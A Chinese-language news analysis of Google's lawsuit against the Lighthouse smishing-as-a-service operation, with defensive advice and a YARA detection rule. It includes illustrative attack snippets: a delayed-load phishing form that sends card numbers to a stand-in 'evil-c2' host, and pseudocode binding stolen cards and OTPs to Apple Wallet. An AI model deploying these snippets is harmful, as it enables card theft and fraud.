2025年11月12日,美国纽约南区联邦法院迎来一份不同寻常的诉状——科技巨头Google正式对一个代号为“Lighthouse”(灯塔)的中国境内网络钓鱼服务发起民事诉讼。这并非一次普通的品牌维权,而是一场针对所谓“Smishing Triad”(短信钓鱼三人组)的系统性打击行动。据KrebsOnSecurity独家披露,该团伙利用高度模块化的“钓鱼即服务”(Phishing-as-a-Service, PhaaS)平台,在全球120多个国家造成超百万受害者,其手法之娴熟、规模之庞大、组织之严密,已远超传统网络犯罪范畴。
这场诉讼不仅标志着大型科技公司开始以法律武器主动“溯源反制”境外网络黑产,更将中国境内的PhaaS生态首次置于国际聚光灯下。而在国内,这一事件也引发安全界对本土短信钓鱼威胁升级的深度反思——当“仿USPS短信”变成“仿顺丰快递通知”,我们是否已做好准备?
一、“灯塔”照向何方?揭秘Smishing Triad的运作流水线
根据Google提交的诉状,“Lighthouse”并非单一黑客团队,而是一个由五大功能小组构成的“企业化”犯罪联合体:
开发组:负责维护Lighthouse平台,提供600余种钓鱼模板,覆盖400多个知名品牌,包括Apple、Google、PayPal、摩根大通、富国银行,甚至美国邮政(USPS)和E-ZPass电子收费系统;
数据经纪组:批量采购或爬取用户手机号、姓名、地理位置等信息,用于精准投放;
短信投递组:通过虚拟运营商、灰色短信通道或SIM卡池(SIM Box)大规模发送伪装成官方通知的短信;
盗刷变现组:在获取支付卡信息及一次性验证码(OTP)后,迅速绑定至攻击者控制的Apple Pay或Google Pay钱包,并在7–10天内完成高价值商品套现;
运营支持组:在Telegram上开设客服频道,提供多语言技术支持、模板更新、甚至“新手教学视频”。
“他们不是散兵游勇,而是一家‘SaaS公司’,只不过卖的是犯罪工具。”公共互联网反网络钓鱼工作组技术专家芦笛指出,“Lighthouse的客户只需支付月费,就能获得从建站、发信到洗钱的一站式服务——这正是PhaaS模式最危险的地方。”
典型的攻击流程如下:
用户收到一条看似来自“USPS”的短信:“您的包裹因地址不详被扣留,请点击链接支付$2.99重新派送”;
点击后跳转至一个高度仿真的USPS登录页(域名如 usps-delivery[.]online),要求输入信用卡信息;
提交后页面提示:“银行正在验证,请输入您刚收到的6位验证码”;
用户输入验证码——殊不知,此时攻击者正用该卡尝试在Apple设备上添加新支付方式,而验证码正是银行发送的授权码;
一旦绑定成功,攻击者即可在实体商店(如苹果专卖店、珠宝店)使用Apple Pay进行无卡交易。
整个过程平均耗时不足3分钟,且因利用了合法移动支付体系,初期极难被风控系统识别。
二、技术内核拆解:Lighthouse如何绕过传统防御?
要理解Lighthouse为何能长期肆虐,需深入其技术架构。安全研究人员发现,该平台具备三大“反侦察”特性:
1. 域名快速轮换 + CDN混淆
据网络安全公司Silent Push 2025年5月报告,Smishing Triad在任意8天窗口期内可激活约25,000个钓鱼域名。这些域名通常注册于隐私保护服务,并通过Cloudflare、Alibaba Cloud等CDN加速,使得IP地址与真实服务器分离。
# 示例:基于WHOIS和DNS历史的钓鱼域名聚类(简化版)
import whois
import dns.resolver
def is_suspicious_domain(domain):
try:
w = whois.whois(domain)
# 检查注册时间是否<7天
if (datetime.now() - w.creation_date).days < 7:
return True
# 检查NS记录是否指向廉价DNS服务商
ns_records = dns.resolver.resolve(domain, 'NS')
for ns in ns_records:
if 'cheapdns' in str(ns).lower():
return True
except Exception as e:
pass
return False
此类自动化检测虽有效,但面对每日数千新域名的生成速度,传统黑名单机制往往滞后。
2. 模板动态加载 + 品牌元素克隆
Lighthouse后台允许用户选择目标品牌(如“Chase Bank”),系统自动生成包含该品牌Logo、配色、字体甚至favicon的完整页面。Google在诉状中特别指出,其商标被非法嵌入至少1/4的模板中。
更隐蔽的是,部分模板采用“延迟加载”技术:初始HTML不含敏感关键词,待用户交互后再通过JavaScript注入支付表单。
<!-- 初始页面仅显示“Processing...” -->
<div id="loader">Processing your request...</div>
<script>
// 3秒后动态插入表单(规避静态扫描)
setTimeout(() => {
document.getElementById('loader').innerHTML = `
<form action="https://evil-c2[.]com/collect" method="POST">
<img src="https://legit-cdn[.]com/chase-logo.png" />
<input type="text" name="card_number" placeholder="Card Number" />
<input type="submit" value="Verify Payment" />
</form>
`;
}, 3000);
</script>
这种“行为触发式钓鱼”极大提升了绕过邮件网关和网页内容过滤器的成功率。
3. 移动钱包绑定自动化
最致命的一环在于OTP劫持后的自动绑定。攻击者利用Apple/Google提供的API(或模拟浏览器自动化工具如Puppeteer),在后台静默完成钱包添加。
// 伪代码:模拟Apple Pay卡绑定流程(需配合真实设备或模拟器)
const puppeteer = require('puppeteer');
(async () => {
const browser = await puppeteer.launch({ headless: true });
const page = await browser.newPage();
// 导航至Apple Wallet添加页面(需已登录iCloud)
await page.goto('https://wallet.apple.com/add-card');
// 自动填充从钓鱼页窃取的卡号、CVV、有效期
await page.type('#card-number', stolenCard.number);
await page.type('#cvv', stolenCard.cvv);
await page.select('#expiry-month', stolenCard.expMonth);
await page.select('#expiry-year', stolenCard.expYear);
// 等待银行发送OTP,再从C2服务器接收并填入
const otp = await fetchOTPFromC2();
await page.type('#otp-input', otp);
await page.click('#submit-button');
await browser.close();
})();
由于整个过程发生在用户授权的设备上(攻击者通过远程控制或二手设备获得),银行风控系统常误判为“正常用户行为”。
三、托管于中国云:法律追责的“灰色地带”
值得注意的是,Silent Push数据显示,Lighthouse所用钓鱼站点大量托管于两家中国云服务商:腾讯云(AS132203)与阿里云(AS45102)。尽管这些平台均有安全合规政策,但因钓鱼站点生命周期极短(平均存活<48小时),且常伪装成普通电商或博客,自动检测难度极大。
“这不是平台纵容,而是攻防不对称。”芦笛解释,“攻击者用自动化脚本批量部署,而平台依赖人工举报或模型识别,天然处于被动。”
Google此次诉讼的一大战略意图,正是试图通过美国法院的缺席判决(default judgment),获得具有法律效力的侵权认定,进而向中国云服务商施压:“若贵司继续为已被司法认定的犯罪基础设施提供服务,可能面临连带责任。”
这一策略在过往案例中已有先例。2023年,微软曾依据法院禁令,成功促使某东南亚IDC下架Emotet僵尸网络C2服务器。但在中国法律框架下,境外判决的执行力仍存争议。
四、从USPS到顺丰:国内威胁的镜像演进
尽管Lighthouse主要针对欧美用户,但其技术模式已在国内复现。2025年以来,国内多地出现仿冒“顺丰速运”“京东物流”“ETC中心”的短信钓鱼事件。例如:
“【顺丰】您的包裹含违禁品,请点击 sf-express-verify[.]cn 缴纳保证金”;
“【ETC】您的高速账户异常,需立即认证 etcservice-update[.]top”。
这些站点同样采用动态表单、品牌克隆,并诱导用户输入银行卡号及短信验证码。更令人担忧的是,部分团伙已开始尝试绑定支付宝“先享后付”或微信支付分,实现信用套现。
“国内用户对短信的信任度更高,且移动支付普及率全球领先,这反而成了攻击者的‘理想温床’。”芦笛警告,“我们监测到,有PhaaS平台已推出中文模板,专门针对淘宝、拼多多、美团等本土App。”
五、防御之道:从个体警惕到生态协同
面对如此精密的攻击,仅靠用户“提高警惕”远远不够。真正的防线需构建于三个层面:
1. 个人用户:切断“信任链”
绝不点击短信中的链接处理缴费、物流、账户问题。应手动打开官方App或浏览器输入官网地址;
启用双重验证(2FA)时避免使用短信,优先选择Authenticator应用或硬件密钥;
若已输入验证码,立即联系银行冻结卡片,并检查Apple Pay/Google Pay设备列表。
2. 企业侧:品牌防护前置化
注册核心品牌关键词的防御性域名(如 brand-security.com);
部署Brand Protection服务,实时监控暗网、Telegram、域名注册库中的仿冒线索;
在官网显著位置发布“我们绝不会通过短信索要验证码”的声明。
3. 安全社区:共享IOC,推动自动化阻断
公共互联网反网络钓鱼工作组建议,各机构应积极上报钓鱼URL、域名、IP、SSL证书指纹等IOC(Indicators of Compromise),并通过STIX/TAXII协议实现情报共享。
例如,以下YARA规则可用于检测Lighthouse典型页面特征:
rule Lighthouse_Phish_Template {
meta:
description = "Detects Lighthouse phishing page with OTP prompt"
strings:
$s1 = "Your bank has sent a verification code" nocase
$s2 = "Enter the 6-digit code below to complete" nocase
$s3 = /<input[^>]*name=["']otp["']/ nocase
$logo_google = "https://www.google.com/images/branding/googlelogo"
condition:
2 of ($s1, $s2, $s3) and $logo_google
}
此类规则可集成至邮件网关、EDR或Web代理中,实现毫秒级拦截。
六、结语:没有终点的攻防马拉松
Google的诉讼或许能暂时打散Lighthouse的Telegram频道,迫使其更名重启,但正如SecAlliance研究员Ford Merrill所言:“只要利润足够高,他们永远不会真正消失。”
真正的胜利不在于摧毁一个“灯塔”,而在于让每一座“灯塔”都难以点亮。这需要法律、技术、教育与国际合作的四重奏——在美国法院敲响法槌的同时,中国的云服务商、电信运营商、安全厂商与普通网民,也必须成为这场全球反钓鱼战役中不可或缺的一环。
毕竟,下一条仿冒短信,可能就发到你的手机上。而你,是否已准备好说“不”?
编辑:芦笛(公共互联网反网络钓鱼工作组)
